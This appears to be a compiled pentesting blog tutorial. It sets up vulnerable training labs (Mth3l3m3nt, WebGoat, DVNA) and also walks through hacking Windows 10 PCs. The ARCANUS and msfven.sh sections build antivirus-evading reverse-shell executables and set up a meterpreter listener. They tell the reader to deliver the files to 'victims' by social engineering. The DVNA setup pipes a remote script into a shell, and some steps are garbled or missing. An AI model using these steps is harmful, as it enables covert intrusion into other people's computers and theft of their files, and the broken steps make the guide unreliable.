Setup Web Penetration Testing Lab using OWASP Mth3l3m3nt Framework

OWASP Mth3l3m3nt Framework is a penetration testing aiding tool and exploitation framework. Mth3l3m3nt provides the ability to create or do custom LFI and RFI exploits fast with little or no effort at all. It also enables you to store all your quick wins based on its ability to manage HTTP bots, say no to runaway web shells and yes to centrally managed herds in large penetration testing engagements

The purpose of this project is to provide a platform to enable more flexible testing especially in aspects regarding to web security and the OWASP top 10 threats to web applications. This will enable free and open source collaboration, being a web based tool, it is intended to make offensive security on the web easier and more efficient as it leverages on existing technologies with few dependencies. It is built on purely open source components. It is intended to build up to a fully-fledged web penetration testing framework with extensibility for zero day exploits in minutes to users. Currently the features it offers:

·         Multi-Database Support (JIG,SQLite,MySQL,MongoDB,PostgreSQL,MSSQL)

·         LFI/RFI exploitation Module

·         Web Shell Generator (ASP,PHP,JSP,JSPX,CFM)

·         Payload Encoder and Decoder

·         Custom Web Requester (GET/HEAD/TRACE/OPTIONS/POST)

·         Web Herd (HTTP Bot tool to manage web shells)

·         Client Side Obfuscator

·         String Tools

·         Whois

Download WAMP server here. Select save or run. Click open. After that follow the next steps.

Next you will see the Select Destination Location screen. Click Next to continue.

Next you will see the Ready to install screen. Click Install to continue.

Once the files are extracted, you will be asked to select your default browser. Select your default browser’s .exe file, then click Open to continue.

Once the progress bar is completely green, the PHP Mail Parameters screen will appear. Leave the SMTP server as localhost, and change the email address to one of your choosing. Click Next to continue.

Download the latest version of the Software from the github i.e.https://github.com/alienwithin/OWASP-mth3l3m3nt-frameworkrepository.

Extract Mth3l3m3nt lab setup in the location” C:\wamp\WWW\Mth” as is shown below.

Now find the data folder in framework options

Now, the first thing is giving the right permissions to the folders. Right click on them and change the attributes

Now open the htaccess file and add Rewritebase /Mth in Line 8

Next Load the site on the address bar localhost://Mth

The default credentials are:

username: mth3l3m3nt

password: mth3l3m3nt

Web Penetration Lab Setup using Webgoat in kali Linux

WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons. You can install and practice with WebGoat. There are other 'goats' such as WebGoat for .Net. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat applications. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application aims to provide a realistic teaching environment, providing users with hints and code to further explain the lesson.

First Download webgoat from here and Unzip the WebGoat-OWASP_Standard using following command

p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z

Now goto webgoat folder now you will need to start/stop WebGoat as root

Sh webgoat.sh start8080

Start your browser and browse to http://localhost/webgoat/attack

Login in as:

user = guest,

password = guest

Hack Remote Windows 10 PC using ARCANUS (Bypass All Antivirus)

ARCANUS is a customized payload generator/handler for penetration testing only

WHY USE ARCANUS ?

·         İn pen.test world Metasploit is the mainstream for this job, but ARCANUS has few advantages.

·         ARCANUS generates a unique payload for windows and linux systems that can't be detected with any antivirus programs. (Don't give any samples to Virus Total or similar web sites to keep it that way ;D )

·         It has extra modules for exploitation. Ordinary reverse shell payloads offers only remote access to command prompts but ARCANUS has few special commands like " £persistence, £download, £upload, £meterpreter..."

·         It is silent and continuous. Metasploit payloads attempts to connect remote host just for ones but when you execute ARCANUS payloads they makes connection attemps every 5 second silently in background.

·         It is flexible. If you want to use it with Metasploit it has a meterpreter module for executeing meterpreter shellcodes on remote machine.

·         Platform independent ! ARCANUS works both on windows and linux.

Open your kali Linux terminal and type the following command

https://github.com/EgeBalci/ARCANUS.git

Open terminal and type ./ARCANUS and press enter to continue

Now it will ask you for your choice press 2 now a pop up will open click on enter

Now Enter IP addresses of your kali Linux pc. And press enter. In next step it will ask for port no. Enter the port no.  Such as 4444 and press enter

Now it will save a file with name payload.exe now send your exe files to victim using any social engineering technique.

Go to https://www.virustotal.com/en

Click the “Choose File” button. Navigate to and double-click the payload.exe. Appears in the “Choose File” box, as shown below:

Now when the victim opens payload.exe you can access of windows command prompt. Now run SystemInfo in prompt, will tell you all you need to know about your computer system

When we need to retrieve a file from the target we use the download command

£download “Filename” /root/Your Path

For More Command visit here

Exploit Windows 10 PC using msfven.sh Script

Open your kali Linux terminal and type the following command

https://github.com/wayneaswilliams/msfvenom_custom_encoding.git

Now type following command to create payload

./msfven.sh

Now Enter IP addresses of your kali Linux pc. And press enter. In next step it will ask for port no. Enter the port no.  Such as 4445 and press enter

In next step use payloads e.g.windows/meterpreter/reverse_tcp and press enter

Now it will show a file with name tcp_445.exe now send your exe files to victim using any social engineering technique.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.140

exploit

Now send your exe files to victim using any social engineering technique. Now when the victim will use exe you will get the meterpreter of victim PC.

Web Hacking Lab Setup using DVNA in Kali Linux

Damn Vulnerable Node Application (DVNA) is a Node.js web application that is damn vulnerable. Its intended purpose is to teach secure coding concepts to web developers who use Node, and to explore web application vulnerabilities in a controlled class environment or to serve as a cyber range for capture the flag events. It's loaded with common web vulnerabilities and various levels of complexity.

Open your kali Linux terminal and type the following command

sudo apt-get install git

Now type

wget -qO- https://raw.github.com/creationix/nvm/master/install.sh | sh

source ~/.bashrc







In next type

nvm install 5.3.0

nvm use 5.3.0

git clone https://github.com/quantumfoam/DVNA.git

cd DVNA/

npm set progress=false

In next step type







Now type

node dvna.js

Navigate to http://localhost:3000/